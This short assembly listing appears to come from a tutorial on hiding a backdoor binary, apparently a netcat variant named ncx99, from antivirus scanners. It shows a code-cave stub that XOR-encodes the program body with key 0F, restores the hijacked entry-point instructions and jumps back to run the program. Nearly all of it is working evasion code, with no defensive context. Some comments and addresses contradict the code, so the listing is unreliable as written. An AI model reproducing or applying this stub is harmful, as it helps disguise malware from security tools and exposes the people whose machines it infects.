00412800   Code cave starts


Original entry point:

00404C00 n> $  55                PUSH EBP
00404C01    .  8BEC              MOV EBP,ESP
00404C03    .  6A FF             PUSH -1
00404C05    .  68 00B04000       PUSH ncx99.0040B000


Encoding starts - 00404C0A
Encoding stops  - 0040A76F


MOV EAX, 00404C05         # Save start of encoding address in EDX
XOR BYTE PTR DS:[EAX],0F  # XOR the contents od EDX with xor key - 0F.
INC EAX                   # Increase EAX.
CMP EAX, 0040A76F         # Have we reached the end enc. address?
JLE SHORT 0040A775        # If not, jump back to XOR command.

PUSH EBP                  # If you have, restore 1st hijacked command.
MOV EBP,ESP               # Restore 2nd hijacked command.
PUSH -1                   # Restore 3rd hijacked command.
JMP 00404C05              # Jump to where we left off from.